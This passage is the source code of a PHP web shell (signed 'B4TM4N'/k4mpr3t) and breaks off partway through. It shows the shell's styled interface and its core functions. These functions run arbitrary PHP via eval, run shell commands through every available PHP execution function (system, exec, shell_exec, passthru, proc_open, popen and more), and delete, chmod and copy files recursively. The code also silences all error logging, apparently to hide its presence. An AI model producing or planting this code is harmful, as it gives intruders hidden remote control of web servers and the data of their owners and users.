text-muted\">©<?=date('Y')?></p>\r\n\t</form>\r\n</body>\r\n</html><?php\r\n}\r\nelse\r\n{\r\nob_start(); // Prevent Double Html \$_REQUEST\r\n\r\nif(!strpos(strval(ini_get('disable_functions')),'set_time_limit'))\r\n{\r\n\tset_time_limit(0);\r\n}\r\n\r\n// Debug Settings\r\nif(\$config['debug']==true) \r\n{\r\n\tset_error_handler('error'); // Error Handler\r\n\terror_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);\r\n}\r\nelse\r\n{\r\n\terror_reporting(0);\r\n\tini_set('error_log',null);\r\n\tini_set('html_errors',0);\r\n\tini_set('log_errors',0);\r\n\tini_set('log_errors_max_len',0);\r\n\tini_set('display_errors',0);\r\n\tini_set('display_startup_errors',0);\r\n}\r\n\r\nini_set('max_execution_time','600');\r\nini_set('memory_limit','256M');\r\n\r\n\$agent=B64D(\"FT06ACQoAXYrvHYXMUIMMV5e\"); // Powered by B4TM4N\r\n\$title=\$config['title']; // Title Page\r\n\$start=microtime(true); // Time Pageload\r\n\r\n?><!DOCTYPE html>\r\n<html>\r\n<head>\r\n<title>\r\n<?=\$title?>\r\n</title>\r\n<meta name='author' content='k4mpr3t'/>\r\n<link href=\"data:image/png;base64,AAABAAEAEBACAAAAAACwAAAAFgAAACgAAAAQAAAAIAAAAAEAAQAAAAAAQAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//wAA//8AAP//AAD//wAA//8AAP7/AAD8fwAAwAcAAMAHAACMYwAADWEAAP//AAD//wAA//8AAP//AAD//wAA\" rel=\"icon\" type=\"image/x-icon\" />\r\n<style type=\"text/css\">\r\n\r\n\t<?php if(strtolower(\$config['themes']) == 'd4rk'): ?>\r\n\t:root {\r\n\t\t--background-color:#000; \r\n\t\t--color:#00ff00;\r\n\t\t--txt-color: #fff;\r\n\t\t--txt-hover-color: #fff;\r\n\t\t--border-color: #222;\r\n\t\t--border-hover-color: #333;\r\n\t\t--table-odd-color : #000;\r\n\t\t--table-even-color : #111;\r\n\t\t--table-hover-color : #222;\r\n\t\t--button-color : #111;\r\n\t\t--button-hover-color : #222;\r\n\t}\r\n\t<?php endif; ?>\r\n\r\n\t<?php if(strtolower(\$config['themes']) == 'br34k'): ?>\r\n\t:root {\r\n\t\t--background-color:#fff; \r\n\t\t--color:#000;\r\n\t\t--txt-color: #000;\r\n\t\t--txt-hover-color: #666;\r\n\t\t--border-color: #111;\r\n\t\t--border-hover-color: #222;\r\n\t\t--table-odd-color : #eee;\r\n\t\t--table-even-color : #ddd;\r\n\t\t--table-hover-color : #ccc;\r\n\t\t--button-color : #ccc;\r\n\t\t--button-hover-color : #bbb;\r\n\t}\r\n\t<?php endif; ?>\r\n\r\n\t@keyframes blinker{70%{opacity:0}}\r\n\t*,html{margin:0;padding:0;line-height:1rem}\r\n\tbody{background:var(--background-color);color:var(--color);font-family:monospace;font-size:13px}\r\n\t::-moz-selection{background:var(--color);color:var(--background-color)}\r\n\t::selection{background:var(--color);color:var(--background-color)}\r\n\timg{vertical-align:bottom}\r\n\thr{border:1px solid var(--border-color);margin:3px 0px 0px}\r\n\ta{color:var(--color);text-decoration:none}\r\n\ta:hover{color:var(--txt-hover-color)}\r\n\ta.active{color:var(--txt-color)}\r\n\ta.action{font-size:12px;padding:5px;margin:0px;background:var(--button-color);color:var(--txt-color);border:1px solid #222;cursor:pointer;outline:none;display:inline-block}\r\n\ta.action:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}\r\n\tlabel{display:inline-block;min-width:75px;padding-right:15px}\r\n\tiframe{background:var(--txt-hover-color)}\r\n\tfieldset {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;box-sizing:border-box;min-height:154px}\r\n\ttextarea {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;min-height:300px;outline:none;box-sizing:border-box;resize:none}\r\n\tinput[type=submit]{background:var(--button-color);border:1px solid var(--border-color);color:var(--txt-color);line-height:25px;padding:0 10px;cursor:pointer;outline:none}\r\n\tinput[type=submit]:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}\r\n\tinput[type=text]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}\r\n\tinput[type=number]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}\r\n\tinput[type=file]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:2px;outline:none;box-sizing:border-box}\r\n\tselect{background:var(--background-color);color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}\r\n\t#wrapper{width:93%;margin:37px auto 40px}\r\n\t#info{margin:0 0 23px 0;padding:0 13px 0 0}\r\n\t#header{display:inline-block;width:100%}\r\n\t.header-left{float:left;width:66%}\r\n\t.header-right{float:right;width:34%}\r\n\t#connect{display:inline-block;width:100%}\r\n\t.connect-left{float:left;width:49%}\r\n\t.connect-right{float:right;width:49%}\r\n\t#database-session{display:inline-block;width:100%}\r\n\t.database-query{float:left;width:49%}\r\n\t.database-process{float:right;width:49%}\r\n\t#php{display:inline-block}\r\n\t.php-left{float:left;width:49%}\r\n\t.php-right{float:right;width:49%}\r\n\t.divide{width:100%;display:inline-block}\r\n\t.divide-left{float:left;width:50%}\r\n\t.divide-right{float:right;width:50%}\r\n\t.mail input[type=text]{width:100%;display:block}\r\n\t.database-breadcrumb{margin:10px 0 0;display:inline-block;font-style: italic;}\r\n\t#update{text-align:center}\r\n\t#php-configuration{text-align:center}\r\n\t.error{animation:blinker 1s linear infinite;background:var(--color);color:var(--background-color);padding:10px;margin:10px;}\r\n\t#logo{margin:0 0 23px 0;padding:23px 0 23px 0;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color)}\r\n\t.content{border:1px solid var(--border-color);padding:10px;overflow:auto;overflow-y:hidden}\r\n\t#process-list{padding:25px;margin:25px auto 0px;border:1px solid var(--border-color);overflow:scroll;overflow-y:hidden}\r\n\t#process-list s{text-decoration:none}\r\n\t.tools-header{margin-bottom:20px;padding-bottom:25px;text-align:center;border-bottom:1px solid var(--border-color)}\r\n\t.menu{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}\r\n\t.menu > ul{list-style:none;margin:0;padding:0}\r\n\t.menu > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}\r\n\t.menu > ul > li:hover{cursor:pointer}\r\n\t.menu-tools{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}\r\n\t.menu-tools > ul{list-style:none;margin:0;padding:0}\r\n\t.menu-tools > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}\r\n\t.menu-tools > ul > li:hover{cursor:pointer}\r\n\t.menu-directory{;margin-bottom:10px}\r\n\t.new{margin-right:15px;}\r\n\t.hash label{min-width:40px;display:inline-block;padding-right:15px}\r\n\t.hash-capture label{margin:10px 0;display:inline-block}\r\n\t.hash input[type=radio]{margin-right:10px;display:inline-block;vertical-align:middle}\r\n\t.auto-number table{counter-reset:row_}\r\n\t.auto-number table tbody tr td:first-child{counter-increment:row_;vertical-align:middle;text-align:center}\r\n\t.auto-number table tbody tr td:first-child::before{content:counter(row_)}\r\n\t#title{text-align:center;font-size:44px;margin:0;color:var(--txt-color);margin-bottom:15px}\r\n\t#subtitle{text-align:center;font-size:22px;margin:0;color:var(--txt-color);margin-top:8px}\r\n\t#tools{min-height:125px;padding:10px;border-radius:5px}\r\n\t#account{min-height:100px;padding:10px;border-radius:5px}\r\n\t#thanks{text-align:center;font-size:16px;font-family:courier;padding:5% 0}\r\n\t#footer{margin:25px auto}\r\n\t#copyrights{text-align:center}\r\n\t#pageload{text-align:center}\r\n\t#query{margin-top:10px}\r\n\t#database-query{overflow:auto;margin:10px 0}\r\n\t#hexdump{height:300px;overflow:auto;overflow-x:hidden}\r\n\t#terminal{min-height:100px;padding:10px;border-radius:5px}\r\n\t#terminal-input{border:none}\r\n\t#curdir-terminal{min-width:10px}\r\n\t#database{min-height:100px;padding:10px;border-radius:5px}\r\n\t#database label{width:100px;padding:5px;margin-right:10px;display:inline-block}\r\n\t#port-scan label{width:100px;padding:5px;margin-right:10px;display:inline-block}\r\n\t#phpinfo table{margin:25px 0}\r\n\t#phpinfo tr:nth-child(odd){background:var(--background-color)}\r\n\t#phpinfo tr:nth-child(even){background:var(--border-color)}\r\n\t#phpinfo td,th{padding:5px;border:1px solid var(--border-color)}\r\n\t#phpinfo h1{margin:10px 0}\r\n\t#phpinfo h2{margin:10px 0}\r\n\t#phpinfo.e{width:200px}\r\n\t#phpinfo.v{word-break:break-word}\r\n\t#phpinfo img{display:none}\r\n\t#phpinfo hr{border:none}\r\n\t.line h2{position:relative;top:12px;width:100px;display:inline;background:var(--background-color);padding:0 10px;color:var(--txt-color)}\r\n\t.line{border-bottom:2px solid var(--color);text-align:center;width:287px;margin:auto}\r\n\t.table {width:100%;margin:10px 0}\r\n\t.table td,th{padding:5px;border:1px solid var(--border-color);max-width:250px;min-width:25px}\r\n\t.table td.kanan{word-break:break-word}\r\n\t.table td.kiri{width:30%}\r\n\t.table tr:nth-child(odd){background:var(--table-odd-color)}\r\n\t.table tr:nth-child(even){background:var(--table-even-color)}\r\n\t.table tr:hover td{background:var(--table-hover-color)}\r\n\t.table tfoot td{padding:10px;text-align:center}\r\n\t.database-table > td.table {word-break:normal;}\r\n\t.map-switch{display:inline-block}\r\n\t.form-fix{margin:-15px 0}\r\n\t.frmsource{margin-top:10px}\r\n\t.hexdump{width:100%;padding:5px;margin-bottom:5px}\r\n\t.hexdump td{text-align:left}\r\n\t.highlight{background:var(--background-color);word-break:break-word;padding:15px;margin-bottom:5px;height:300px;overflow:auto}\r\n\t.hash-capture{display:inline-block;width:100%}\r\n\t.hash-capture-left{float:left;width:49%}\r\n\t.hash-capture-right{float:right;width:49%}\r\n\t.clr{clear:both}\r\n\t.on{color:var(--txt-color)}\r\n\t.off{color:red}\r\n\t.result{padding:10px}\r\n\t.sortable thead{cursor:pointer}\r\n\t.disablefunc{overflow-wrap:break-word}\r\n\t.loading{vertical-align:middle;width:16px;height:16px;display:inline-block;background:url('data:image/gif;base64,R0lGODlhEAAQAPIAAAAAAP///zw8PLy8vP///5ycnHx8fGxsbCH+GkNyZWF0ZWQgd2l0aCBhamF4bG9hZC5pbmZvACH5BAAKAAAAIf8LTkVUU0NBUEUyLjADAQAAACwAAAAAEAAQAAADMwi63P4wyklrE2MIOggZnAdOmGYJRbExwroUmcG2LmDEwnHQLVsYOd2mBzkYDAdKa+dIAAAh+QQACgABACwAAAAAEAAQAAADNAi63P5OjCEgG4QMu7DmikRxQlFUYDEZIGBMRVsaqHwctXXf7WEYB4Ag1xjihkMZsiUkKhIAIfkEAAoAAgAsAAAAABAAEAAAAzYIujIjK8pByJDMlFYvBoVjHA70GU7xSUJhmKtwHPAKzLO9HMaoKwJZ7Rf8AYPDDzKpZBqfvwQAIfkEAAoAAwAsAAAAABAAEAAAAzMIumIlK8oyhpHsnFZfhYumCYUhDAQxRIdhHBGqRoKw0R8DYlJd8z0fMDgsGo/IpHI5TAAAIfkEAAoABAAsAAAAABAAEAAAAzIIunInK0rnZBTwGPNMgQwmdsNgXGJUlIWEuR5oWUIpz8pAEAMe6TwfwyYsGo/IpFKSAAAh+QQACgAFACwAAAAAEAAQAAADMwi6IMKQORfjdOe82p4wGccc4CEuQradylesojEMBgsUc2G7sDX3lQGBMLAJibufbSlKAAAh+QQACgAGACwAAAAAEAAQAAADMgi63P7wCRHZnFVdmgHu2nFwlWCI3WGc3TSWhUFGxTAUkGCbtgENBMJAEJsxgMLWzpEAACH5BAAKAAcALAAAAAAQABAAAAMyCLrc/jDKSatlQtScKdceCAjDII7HcQ4EMTCpyrCuUBjCYRgHVtqlAiB1YhiCnlsRkAAAOwAAAAAAAAAAAA==')}\r\n</style>\r\n<script type=\"text/javascript\">\r\nfunction dean_addEvent(t,e,r){if(t.addEventListener)t.addEventListener(e,r,!1);else{r.\$\$guid||(r.\$\$guid=dean_addEvent.guid++),t.events||(t.events={});var o=t.events[e];o||(o=t.events[e]={},t[\"on\"+e]&&(o[0]=t[\"on\"+e])),o[r.\$\$guid]=r,t[\"on\"+e]=handleEvent}}function removeEvent(t,e,r){t.removeEventListener?t.removeEventListener(e,r,!1):t.events&&t.events[e]&&delete t.events[e][r.\$\$guid]}function handleEvent(t){var e=!0;t=t||fixEvent(((this.ownerDocument||this.document||this).parentWindow||window).event);var r=this.events[t.type];for(var o in r)this.\$\$handleEvent=r[o],!1===this.\$\$handleEvent(t)&&(e=!1);return e}function fixEvent(t){return t.preventDefault=fixEvent.preventDefault,t.stopPropagation=fixEvent.stopPropagation,t}var stIsIE=!1;if(sorttable={init:function(){arguments.callee.done||(arguments.callee.done=!0,_timer&&clearInterval(_timer),document.createElement&&document.getElementsByTagName&&(sorttable.DATE_RE=/^(\\d\\d?)[\\/\\.-](\\d\\d?)[\\/\\.-]((\\d\\d)?\\d\\d)\$/,forEach(document.getElementsByTagName(\"table\"),function(t){-1!=t.className.search(/\\bsortable\\b/)&&sorttable.makeSortable(t)})))},makeSortable:function(t){if(0==t.getElementsByTagName(\"thead\").length&&(the=document.createElement(\"thead\"),the.appendChild(t.rows[0]),t.insertBefore(the,t.firstChild)),null==t.tHead&&(t.tHead=t.getElementsByTagName(\"thead\")[0]),1==t.tHead.rows.length){sortbottomrows=[];for(e=0;e<t.rows.length;e++)-1!=t.rows[e].className.search(/\\bsortbottom\\b/)&&(sortbottomrows[sortbottomrows.length]=t.rows[e]);if(sortbottomrows){null==t.tFoot&&(tfo=document.createElement(\"tfoot\"),t.appendChild(tfo));for(e=0;e<sortbottomrows.length;e++)tfo.appendChild(sortbottomrows[e]);delete sortbottomrows}headrow=t.tHead.rows[0].cells;for(var e=0;e<headrow.length;e++)headrow[e].className.match(/\\bsorttable_nosort\\b/)||(mtch=headrow[e].className.match(/\\bsorttable_([a-z0-9]+)\\b/),mtch&&(override=mtch[1]),mtch&&\"function\"==typeof sorttable[\"sort_\"+override]?headrow[e].sorttable_sortfunction=sorttable[\"sort_\"+override]:headrow[e].sorttable_sortfunction=sorttable.guessType(t,e),headrow[e].sorttable_columnindex=e,headrow[e].sorttable_tbody=t.tBodies[0],dean_addEvent(headrow[e],\"click\",sorttable.innerSortFunction=function(t){if(-1!=this.className.search(/\\bsorttable_sorted\\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace(\"sorttable_sorted\",\"sorttable_sorted_reverse\"),this.removeChild(document.getElementById(\"sorttable_sortfwdind\")),sortrevind=document.createElement(\"span\"),sortrevind.id=\"sorttable_sortrevind\",sortrevind.innerHTML=stIsIE?' <font face=\"webdings\">5</font>':\" ▴\",void this.appendChild(sortrevind);if(-1!=this.className.search(/\\bsorttable_sorted_reverse\\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace(\"sorttable_sorted_reverse\",\"sorttable_sorted\"),this.removeChild(document.getElementById(\"sorttable_sortrevind\")),sortfwdind=document.createElement(\"span\"),sortfwdind.id=\"sorttable_sortfwdind\",sortfwdind.innerHTML=stIsIE?' <font face=\"webdings\">6</font>':\" ▾\",void this.appendChild(sortfwdind);theadrow=this.parentNode,forEach(theadrow.childNodes,function(t){1==t.nodeType&&(t.className=t.className.replace(\"sorttable_sorted_reverse\",\"\"),t.className=t.className.replace(\"sorttable_sorted\",\"\"))}),sortfwdind=document.getElementById(\"sorttable_sortfwdind\"),sortfwdind&&sortfwdind.parentNode.removeChild(sortfwdind),sortrevind=document.getElementById(\"sorttable_sortrevind\"),sortrevind&&sortrevind.parentNode.removeChild(sortrevind),this.className+=\" sorttable_sorted\",sortfwdind=document.createElement(\"span\"),sortfwdind.id=\"sorttable_sortfwdind\",sortfwdind.innerHTML=stIsIE?' <font face=\"webdings\">6</font>':\" ▾\",this.appendChild(sortfwdind),row_array=[],col=this.sorttable_columnindex,rows=this.sorttable_tbody.rows;for(e=0;e<rows.length;e++)row_array[row_array.length]=[sorttable.getInnerText(rows[e].cells[col]),rows[e]];row_array.sort(this.sorttable_sortfunction),tb=this.sorttable_tbody;for(var e=0;e<row_array.length;e++)tb.appendChild(row_array[e][1]);delete row_array}))}},guessType:function(t,e){sortfn=sorttable.sort_alpha;for(var r=0;r<t.tBodies[0].rows.length;r++)if(text=sorttable.getInnerText(t.tBodies[0].rows[r].cells[e]),\"\"!=text){if(text.match(/^-?[\xc2\xa3\$\xc2\xa4]?[\\d,.]+%?\$/))return sorttable.sort_numeric;if(possdate=text.match(sorttable.DATE_RE),possdate){if(first=parseInt(possdate[1]),second=parseInt(possdate[2]),first>12)return sorttable.sort_ddmm;if(second>12)return sorttable.sort_mmdd;sortfn=sorttable.sort_ddmm}}return sortfn},getInnerText:function(t){if(!t)return\"\";if(hasInputs=\"function\"==typeof t.getElementsByTagName&&t.getElementsByTagName(\"input\").length,null!=t.getAttribute(\"sorttable_customkey\"))return t.getAttribute(\"sorttable_customkey\");if(void 0!==t.textContent&&!hasInputs)return t.textContent.replace(/^\\s+|\\s+\$/g,\"\");if(void 0!==t.innerText&&!hasInputs)return t.innerText.replace(/^\\s+|\\s+\$/g,\"\");if(void 0!==t.text&&!hasInputs)return t.text.replace(/^\\s+|\\s+\$/g,\"\");switch(t.nodeType){case 3:if(\"input\"==t.nodeName.toLowerCase())return t.value.replace(/^\\s+|\\s+\$/g,\"\");case 4:return t.nodeValue.replace(/^\\s+|\\s+\$/g,\"\");case 1:case 11:for(var e=\"\",r=0;r<t.childNodes.length;r++)e+=sorttable.getInnerText(t.childNodes[r]);return e.replace(/^\\s+|\\s+\$/g,\"\");default:return\"\"}},reverse:function(t){newrows=[];for(e=0;e<t.rows.length;e++)newrows[newrows.length]=t.rows[e];for(var e=newrows.length-1;e>=0;e--)t.appendChild(newrows[e]);delete newrows},sort_numeric:function(t,e){return aa=parseFloat(t[0].replace(/[^0-9.-]/g,\"\")),isNaN(aa)&&(aa=0),bb=parseFloat(e[0].replace(/[^0-9.-]/g,\"\")),isNaN(bb)&&(bb=0),aa-bb},sort_alpha:function(t,e){return t[0]==e[0]?0:t[0]<e[0]?-1:1},sort_ddmm:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m=\"0\"+m),1==d.length&&(d=\"0\"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m=\"0\"+m),1==d.length&&(d=\"0\"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},sort_mmdd:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m=\"0\"+m),1==d.length&&(d=\"0\"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m=\"0\"+m),1==d.length&&(d=\"0\"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},shaker_sort:function(t,e){for(var r=0,o=t.length-1,n=!0;n;){n=!1;for(s=r;s<o;++s)if(e(t[s],t[s+1])>0){a=t[s];t[s]=t[s+1],t[s+1]=a,n=!0}if(o--,!n)break;for(var s=o;s>r;--s)if(e(t[s],t[s-1])<0){var a=t[s];t[s]=t[s-1],t[s-1]=a,n=!0}r++}}},document.addEventListener&&document.addEventListener(\"DOMContentLoaded\",sorttable.init,!1),/WebKit/i.test(navigator.userAgent))var _timer=setInterval(function(){/loaded|complete/.test(document.readyState)&&sorttable.init()},10);window.onload=sorttable.init,dean_addEvent.guid=1,fixEvent.preventDefault=function(){this.returnValue=!1},fixEvent.stopPropagation=function(){this.cancelBubble=!0},Array.forEach||(Array.forEach=function(t,e,r){for(var o=0;o<t.length;o++)e.call(r,t[o],o,t)}),Function.prototype.forEach=function(t,e,r){for(var o in t)void 0===this.prototype[o]&&e.call(r,t[o],o,t)},String.forEach=function(t,e,r){Array.forEach(t.split(\"\"),function(o,n){e.call(r,o,n,t)})};var forEach=function(t,e,r){if(t){var o=Object;if(t instanceof Function)o=Function;else{if(t.forEach instanceof Function)return void t.forEach(e,r);\"string\"==typeof t?o=String:\"number\"==typeof t.length&&(o=Array)}o.forEach(t,e,r)}};\r\n</script>\r\n<script type=\"text/javascript\">\r\n\tvar xhr;\r\n\twindow.onload=function(){\r\n\t\tgetFocus(\"terminal-input\");\r\n\t\tgetFocus(\"find-action\");\r\n\t\tgetFocus(\"sourcefocus\");\r\n\t\tgetFocus(\"php-code\");\r\n\t};\r\n\tfunction getFocus(id){\r\n\t\tif(document.getElementById(id)!==null){\r\n\t\tdocument.getElementById(id).focus();}\r\n\t}\r\n\tfunction getAjax(txt,id,method,url){\r\n\t\tvar xmlhttp;\r\n\t\tvar urlf=\"\";\r\n\t\tvar data=new FormData();\r\n\t\tvar params=url.split(\"&\");\r\n\t\tfor(i=0;i<params.length;i++){\r\n\t\tval=params[i].split(\"=\");\r\n\t\tif(val[0]=='text-encode'){\r\n\t\tdata.append(val[0],val[1]);\r\n\t\t}else{if(val[0].indexOf('?')<0)\r\n\t\t{urlf+='&'+val[0]+'='+val[1];}}}\r\n\t\tif(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();\r\n\t\t}else{xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\");}\r\n\t\txmlhttp.onreadystatechange=function(){\r\n\t\tsts=[\"Request Not Initialized\",\r\n\t\t\"Server Connection Established\",\r\n\t\t\"Request Received\",\r\n\t\t\"Processing Request\",\r\n\t\t\"Request Finished\"];\r\n\t\tif(xmlhttp.readyState==4&&xmlhttp.status==200){\r\n\t\tif(txt){document.getElementById(id).innerHTML=xmlhttp.responseText;\r\n\t\t}else{document.getElementById(id).value=xmlhttp.responseText;}\r\n\t\t}else{\r\n\t\tif(txt){document.getElementById(id).innerHTML=\r\n\t\t\"[Status] \"+\"Please Wait... <div class='loading'></div><br>\"+\r\n\t\t\"[State] \"+sts[xmlhttp.readyState]+\"<br>\"+\r\n\t\t\"[Response] \"+xmlhttp.response;\r\n\t\t}else{document.getElementById(id).value=\r\n\t\t\"[Status] \"+\"Please Wait...\\n\"+\r\n\t\t\"[State] \"+sts[xmlhttp.readyState]+\"\\n\"+\r\n\t\t\"[Response] \"+xmlhttp.response;}}\r\n\t\t};\r\n\t\txmlhttp.open(method,window.location.href+urlf,true);\r\n\t\txmlhttp.send(data);\r\n\t\txhr=xmlhttp;\r\n\t}\r\n\tfunction ajaxAbort(txt,id){\r\n\t\tif(txt){document.getElementById(id).innerHTML=\"Canceled\";\r\n\t\t}else{document.getElementById(id).value=\"Canceled\";}\r\n\t\txhr.abort();\r\n\t}\r\n\tfunction checkAll(){\r\n\t\tfor(var i=0;i<document.getElementsByName('chk[]').length;i++){\r\n\t\tdocument.getElementsByName('chk[]')[i].checked=document.getElementsByName('check-all')[0].checked;}\r\n\t}\r\n\tfunction checkCount(id){\r\n\t\tcount=1;\r\n\t\tfor(var i=0;i<document.getElementsByName('chk[]').length;i++){\r\n\t\tif(document.getElementsByName('chk[]')[i].checked){\r\n\t\tdocument.getElementById(id).innerHTML=count++;\r\n\t\t}else{document.getElementById(id).innerHTML=count-1;}}\r\n\t}\r\n\tfunction mapSwitch(id,id2){\r\n\t\tvar a=document.getElementById(id);\r\n\t\tvar b=document.getElementById(id2);\r\n\t\tif(a.style.display=='inline-block'){\r\n\t\ta.style.display='none';\r\n\t\tb.style.display='inline-block';\r\n\t\t}else{a.style.display='inline-block';\r\n\t\tb.style.display='none';}\r\n\t}\r\n\tfunction getParameter(p) {\r\n\t\tvar searchString=window.location.search.substring(1),\r\n\t\ti,val,params=searchString.split(\"&\");\r\n\t\tfor(i=0;i<params.length;i++){\r\n\t\tval=params[i].split(\"=\");\r\n\t\tif(val[0]==p){\r\n\t\treturn val[1];}}\r\n\t\treturn null;\r\n\t}\r\n</script>\r\n</head>\r\n<body>\r\n<div id=\"wrapper\"><?php\r\n\r\n\$cur=any(\"c\",\$_SESSION)?urld(\$_SESSION['c']):getcwd();\r\n\$dir=any(\"d\",\$_REQUEST)?urld(\$_REQUEST['d']):\$cur;\r\n\$map=any(\"r\",\$_REQUEST)?dirname(urld(\$_REQUEST['r'])):\$dir;\r\n\r\nfunction Unix() \r\n{\r\n\treturn(strtolower(substr(PHP_OS,0,3))!=\"win\");\r\n}\r\n\r\nfunction Evil(\$x,\$y=false)\r\n{\r\n\t\$c=\$y==true?\"?>\".\$x.\"<?php \":\$x;\r\n\t\$evil=@eval(\$c);\r\n\tif(error_get_last())\r\n\t{\r\n\t\tprint \"\\n[Error] \";\r\n\t\treturn print_r(error_get_last());\r\n\t}\r\n\treturn \$evil;\r\n}\r\n\r\nfunction Execute(\$x)\r\n{\r\n\t\$x=\$x.' 2>&1';\r\n\tif(!is_null(\$backtic=`\$x`))\r\n\t{\r\n\t\treturn \$backtic;\r\n\t}\r\n\telseif(function_exists('system'))\r\n\t{\r\n\t\tob_start();\r\n\t\t\$system=system(\$x);\r\n\t\t\$buff=ob_get_contents();\r\n\t\tob_end_clean();\r\n\t\treturn \$buff;\r\n\t}\r\n\telseif(function_exists('exec'))\r\n\t{\r\n\t\t\$buff=\"\";\r\n\t\texec(\$x,\$results);\r\n\t\tforeach(\$results as \$result)\r\n\t\t{\r\n\t\t\t\$buff.=\$result;\r\n\t\t}\r\n\t\treturn \$buff;\r\n\t}\r\n\telseif(function_exists('shell_exec'))\r\n\t{\r\n\t\t\$buff=shell_exec(\$x);\r\n\t\treturn \$buff;\r\n\t}\r\n\telseif(function_exists('pcntl_exec'))\r\n\t{\r\n\t\t\$buff=pcntl_exec(\$x);\r\n\t\treturn \$buff;\r\n\t}\r\n\telseif(function_exists('passthru'))\r\n\t{\r\n\t\tob_start();\t\t\r\n\t\t\$passthru=passthru(\$x);\r\n\t\t\$buff=ob_get_contents();\r\n\t\tob_end_clean();\t\r\n\t\treturn \$buff;\r\n\t}\r\n\telseif(function_exists('proc_open'))\r\n\t{\r\n\t\t\$proc=proc_open(\$x,array(\r\n\t\t\tarray(\"pipe\",\"r\"),\r\n\t\t\tarray(\"pipe\",\"w\"),\r\n\t\t\tarray(\"pipe\",\"w\")\r\n\t\t),\$pipes);\r\n\t\t\$buff=stream_get_contents(\$pipes[1]);\r\n\t\treturn \$buff;\r\n\t}\r\n\telseif(function_exists('popen'))\r\n\t{\r\n\t\t\$buff=\"\";\r\n\t\t\$pop=popen(\$x,\"r\");\r\n\t\twhile(!feof(\$pop))\r\n\t\t{\r\n\t\t\t\$buff.=fread(\$pop,1024);\r\n\t\t}\r\n\t\tpclose(\$pop);\r\n\t\treturn \$buff;\r\n\t}\r\n\treturn \"R.I.P Command\";\r\n}\r\n\r\nfunction Remove(\$x)\r\n{\r\n\tif(is_dir(\$x))\r\n\t{\r\n\t\tif(\$h=@opendir(\$x))\r\n\t\t{\r\n\t\t\twhile(false!==(\$f=readdir(\$h)))\r\n\t\t\t{\r\n\t\t\t\tif(\$f!=\".\"&&\$f!=\"..\")\r\n\t\t\t\t{\r\n\t\t\t\t\tRemove(\$x._.\$f);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tclosedir(\$h);\r\n\t\t}\r\n\t\treturn rmdir(\$x);\r\n\t}\r\n\telseif(is_file(\$x))\r\n\t{\r\n\t\treturn unlink(\$x);\r\n\t}\r\n\treturn false;\r\n}\r\n\r\nfunction ChmodRecursive(\$x,\$y)\r\n{\r\n\tif(is_dir(\$x))\r\n\t{\r\n\t\tif(\$h=@opendir(\$x))\r\n\t\t{\r\n\t\t\twhile(false!==(\$f=readdir(\$h)))\r\n\t\t\t{\r\n\t\t\t\tif(\$f!=\".\"&&\$f!=\"..\")\r\n\t\t\t\t{\r\n\t\t\t\t\tChmodRecursive(\$x._.\$f);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tclosedir(\$h);\r\n\t\t}\r\n\t\treturn chmod(\$x,\$y);\r\n\t}\r\n\telseif(is_file(\$x))\r\n\t{\r\n\t\treturn chmod(\$x,\$y);\r\n\t}\r\n\treturn false;\r\n}\r\n\r\nfunction CopyRecursive(\$x,\$y)\r\n{\r\n\tif(is_dir(\$x))\r\n\t{\r\n\t\t@mkdir(\$y);\r\n\t\tif(\$h=@opendir(\$x))\r\n\t\t{\r\n\t\t\twhile(false!==(\$f=readdir(\$h)))\r\n\t\t\t{\r\n\t\t\t\tif(\$f!=\".\"&&\$f!=\"..\")\r\n\t\t\t\t{\r\n\t\t\t\t\tCopyRecursive(\$x._.\$f,\$y._.\$f);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tclosedir(\$h);\r\n\t\t}\r\n\t\treturn true;\r\n\t}\r\n\telseif(is_file(\$x))\r\n\t{\r\n\t\treturn copy(\$x,\$y);\r\n\t}\r\n\treturn false;\r\n}\r\n\r\nfunction 